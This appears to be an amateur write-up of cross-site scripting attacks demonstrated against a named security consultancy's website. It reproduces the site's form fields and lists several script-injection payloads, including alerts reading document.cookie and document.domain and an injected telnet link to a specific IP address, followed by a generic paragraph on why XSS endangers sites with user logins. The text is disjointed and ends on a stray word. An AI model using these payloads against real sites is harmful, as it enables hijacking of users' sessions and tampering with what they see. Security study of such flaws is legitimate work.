This analysis will enable you to the different realm of XSS injection attacks. No XSS cheatsheat is used in this.
I am presenting the full analysis of it. The demonstration target is SecTheory security consultation website.
This process goes in both ways. This will throw light on the trodden basics of security companies and also
helpful in determining new class of exploitation. The end result is same but the way is different.
The hackers for exploiting websites look for the security loopholes. Where he finds it he will attack it.
When i was enumerating the website i always track for two elements i.e.

<INPUT TYPE="TEXT" NAME="login" style="width:300px" MAXLENGTH="100"> <div id="contact" align="right"> Your phone number: <INPUT TYPE="TEXT" NAME="number" style="width:300px" MAXLENGTH="100"> <div id="contact" align="right"> Your email address: <INPUT TYPE="TEXT" NAME="email" style="width:300px" MAXLENGTH="100">
'<script>alert(document.cookie);</script> '<script>alert(document.domain);</script>

'<script>alert("XSS Says :Let Me IN !");</script>''''''''



'<script>alert("XSS");</script>'<script>alert(document.domain)'</script>

'<script>alert("XSS");</script>'<a href="telnet://203.197.219.33"><h3>TELNET</h3></a>

This is a serious security issue, with potential implications that are only starting to be understood. However, it is critical to realize that this problem does not expose any way to break into the server itself. What it allows is for malicious attackers to potentially take control of the interaction between a user and a website. If your website contains entirely static content with all information being publicly accessible, an attacker can gain very little from taking over this interaction. It is likely that the most serious thing that an attacker can potentially do in this situation is change how a page appears to a particular user. The sites where this poses the most potential danger are sites where users have some type of account or login and where they can perform actions with real world implications or access data that should not be publicly available. This security problem poses a serious threat to such sites; it isn't necessary to break into the server to take control of a site if instead you can gain access on the user's end of things.
Response